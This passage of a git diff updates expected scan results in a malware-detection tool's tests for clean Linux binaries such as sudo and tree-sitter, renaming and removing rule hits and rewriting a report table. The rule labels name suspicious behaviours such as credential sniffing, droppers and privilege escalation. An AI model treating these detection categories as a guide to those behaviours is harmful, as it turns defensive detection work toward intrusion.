@@ -85,8 +87,6 @@ | MEDIUM | [net/webrtc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/webrtc.yara#webrtc_peer) | makes outgoing WebRTC connections | [RTCPeerConnection](https://github.com/search?q=RTCPeerConnection&type=code) | | MEDIUM | [os/kernel/opencl](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/opencl.yara#OpenCL) | support for OpenCL | [OpenCL](https://github.com/search?q=OpenCL&type=code) | | MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo chmod 1777 /dev/shm](https://github.com/search?q=sudo+chmod+1777+%2Fdev%2Fshm&type=code) | -| MEDIUM | [process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | -| MEDIUM | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [looks up memory addresses for thread local storage or linked libraries](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [!!!!!!!!!!!!!!!!](https://github.com/search?q=%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21&type=code)
[0 !!!](https://github.com/search?q=0+++++%21%21%21&type=code)
[11366 !!](https://github.com/search?q=11366++++++%21%21&type=code)
[12366 !!](https://github.com/search?q=12366+++++%21%21&type=code)
[AAHHKKO !!](https://github.com/search?q=AAHHKKO+++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH+++++%21%21&type=code)
[ACHIJNPRU !!](https://github.com/search?q=ACHIJNPRU+++%21%21&type=code)
[Could not format log message !!](https://github.com/search?q=Could+not+format+log+message+%21%21&type=code)
[FFHHL !!](https://github.com/search?q=FFHHL+++%21%21&type=code)
[GG !!](https://github.com/search?q=GG++++%21%21&type=code)
[INVALID CONSTRUCTOR!!!](https://github.com/search?q=INVALID+CONSTRUCTOR%21%21%21&type=code)
[INVALID MAP!!!](https://github.com/search?q=INVALID+MAP%21%21%21&type=code)
[INVALID SHARED ON CONSTRUCTOR!!!](https://github.com/search?q=INVALID+SHARED+ON+CONSTRUCTOR%21%21%21&type=code)
[return !!](https://github.com/search?q=return+%21%21&type=code) | | MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [interceptBufferProtocol](https://github.com/search?q=interceptBufferProtocol&type=code)
[interceptFileProtocol](https://github.com/search?q=interceptFileProtocol&type=code)
[interceptHttpProtocol](https://github.com/search?q=interceptHttpProtocol&type=code)
[interceptProtocol](https://github.com/search?q=interceptProtocol&type=code)
[interceptResponse](https://github.com/search?q=interceptResponse&type=code)
[interceptStreamProtocol](https://github.com/search?q=interceptStreamProtocol&type=code)
[interceptStringProtocol](https://github.com/search?q=interceptStringProtocol&type=code)
[intercepted](https://github.com/search?q=intercepted&type=code)
[intercepting](https://github.com/search?q=intercepting&type=code)
[interceptionId](https://github.com/search?q=interceptionId&type=code)
[interceptionStage](https://github.com/search?q=interceptionStage&type=code)
[interceptor_info_map](https://github.com/search?q=interceptor_info_map&type=code)
[interceptor_url_loader_throttle](https://github.com/search?q=interceptor_url_loader_throttle&type=code)
[interceptors](https://github.com/search?q=interceptors&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | | MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | @@ -107,6 +107,7 @@ | LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | | LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | +| LOW | [discover/process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | @@ -175,6 +176,5 @@ | LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | | LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/slirp4netns.simple b/tests/linux/clean/slirp4netns.simple index 1129120a1..59973f623 100644 --- a/tests/linux/clean/slirp4netns.simple +++ b/tests/linux/clean/slirp4netns.simple @@ -9,6 +9,7 @@ credential/sniffer/bpf: medium discover/group/lookup: medium discover/network/interface_list: medium discover/network/mac_address: medium +discover/process/parent_pid_get: low discover/system/platform: low discover/system/sysinfo: medium discover/user/HOME: low 
@@ -102,7 +103,6 @@ process/groupid_set: low process/groups_set: low process/multithreaded: low process/namespace_set: low -process/parent_pid_get: low process/unshare: low process/userid_set: low sus/exclamation: medium diff --git a/tests/linux/clean/sonarlint-metadata.json.simple b/tests/linux/clean/sonarlint-metadata.json.simple index 309d055f6..1d4bcdb3f 100644 --- a/tests/linux/clean/sonarlint-metadata.json.simple +++ b/tests/linux/clean/sonarlint-metadata.json.simple @@ -37,7 +37,6 @@ impact/exploit: medium impact/infection/infected: medium impact/remote_access/agent: medium lateral/scan/brute_force: low -lateral/scan/tool: medium net/download: medium net/http/2: low net/http/cookies: medium diff --git a/tests/linux/clean/sudo.simple b/tests/linux/clean/sudo.simple index 5870618b0..3fa77a429 100644 --- a/tests/linux/clean/sudo.simple +++ b/tests/linux/clean/sudo.simple @@ -1,6 +1,7 @@ # linux/clean/sudo: medium credential/password: low discover/network/interface_list: medium +discover/process/parent_pid_get: low discover/system/cpu_info: low discover/system/hostname_get: low discover/user/HOME: low @@ -26,19 +27,17 @@ fs/path/usr_sbin: low fs/path/var: low fs/permission/chown: low fs/proc/arbitrary_pid: medium -fs/proc/pid_exe: medium fs/tempdir/tempfile_create: low -lateral/scan/tool: medium net/ip/string: medium net/socket/listen: medium net/socket/local_addr: low net/socket/receive: low net/socket/send: low os/kernel/seccomp: low +privesc/sudo: medium privesc/sudoers: low process/chroot: low process/groupid_set: low process/groups_set: low -process/parent_pid_get: low process/userid_set: low sus/intercept: medium diff --git a/tests/linux/clean/tracer.o.aarch64.simple b/tests/linux/clean/tracer.o.aarch64.simple index 79e3feebe..1864ab728 100644 --- a/tests/linux/clean/tracer.o.aarch64.simple +++ b/tests/linux/clean/tracer.o.aarch64.simple 
@@ -1,12 +1,10 @@ # linux/clean/tracer.o.aarch64: medium c2/addr/ip: medium collect/databases/mysql: medium -credential/sniffer/bpf: medium discover/network/netstat: medium evasion/bypass_security/linux/iptables: medium evasion/logging/acct: low impact/remote_access/heartbeat: medium -lateral/scan/tool: medium net/http/post: medium net/ip/multicast_send: low net/ip/syncookie: medium @@ -14,3 +12,4 @@ net/socket/listen: medium net/socket/receive: low net/socket/send: low net/tcp/synflood: medium +persist/kernel_module/symbol_lookup: low diff --git a/tests/linux/clean/tree-sitter.md b/tests/linux/clean/tree-sitter.md index 41eb959b5..f398b39de 100644 --- a/tests/linux/clean/tree-sitter.md +++ b/tests/linux/clean/tree-sitter.md 
@@ -1,47 +1,46 @@ ## linux/clean/tree-sitter [🛑 HIGH] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|---------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------| -| HIGH | [exec/shell/tmp_semicolon](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/tmp_semicolon.yara#semicolon_short_tmp) | unusual one-liners involving /tmp | [--;/tmp/rust-20241004-6494-uljaw4/rustc-1](https://github.com/search?q=--%3B%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1&type=code) | -| MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References 'dropper' | [Dropper](https://github.com/search?q=Dropper&type=code) | -| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | -| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/clap/issues/home/linuxbrew/.cache](https://github.com/search?q=%2Fclap%2Fissues%2Fhome%2Flinuxbrew%2F.cache&type=code)
[/debug/.J](https://github.com/search?q=%2Fdebug%2F.J&type=code)
[/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | -| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | -| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | -| MEDIUM | [exec/shell/power](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/powershell.yara#powershell) | powershell | [powershell](https://github.com/search?q=powershell&type=code) | -| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.cache/Homebrew/cargo_cache/registry/src/index.crates.](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.cache%2FHomebrew%2Fcargo_cache%2Fregistry%2Fsrc%2Findex.crates.&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/tree-sitter/0.24.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Ftree-sitter%2F0.24.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code) | -| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/col](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fcol&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/raw](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fraw&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/str](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fstr&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/syn](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fsyn&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/vec](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fvec&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/cell](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fcell&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/esca](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fesca&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/io/b](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fio%2Fb&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/num/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fnum%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/ops/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fops%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/slic](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fslic&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/str/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fstr%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/time](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Ftime&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/mo](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fmo&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/st](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fst&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/os/fd](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fos%2Ffd&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sync/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsync%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/p](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fp&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/threa](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fthrea&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/addr2line-0.22](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Faddr2line-0.22&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/gimli-0.29.0/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fgimli-0.29.0%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/hashbrown-0.14](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fhashbrown-0.14&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/miniz_oxide-0.](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fminiz_oxide-0.&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/rustc-demangle](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Frustc-demangle&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/config/s](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fconfig%2Fs&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/generate](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fgenerate&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/src/high](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fsrc%2Fhigh&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/highlight/sr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fhighlight%2Fsr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/binding_](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fbinding_&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/././](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2F.%2F&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./ge](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fge&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./la](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fla&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./pa](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fpa&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./qu](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fqu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./st](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fst&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./su](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fsu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./tr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Ftr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/tags/src/lib](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Ftags%2Fsrc%2Flib&type=code) | -| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [looks up memory addresses for thread local storage or linked libraries](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | -| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | -| LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) | -| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | -| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) | -| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | -| LOW | [exec/shell/SHELL](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/SHELL.yara#SHELL) | [path to active shell](https://man.openbsd.org/login.1#ENVIRONMENT) | [SHELL](https://github.com/search?q=SHELL&type=code) | -| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | -| LOW | [fs/directory/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-list.yara#GoReadDir) | Uses Go functions to list a directory | [.ReadDir](https://github.com/search?q=.ReadDir&type=code) | -| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | -| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | -| LOW | 
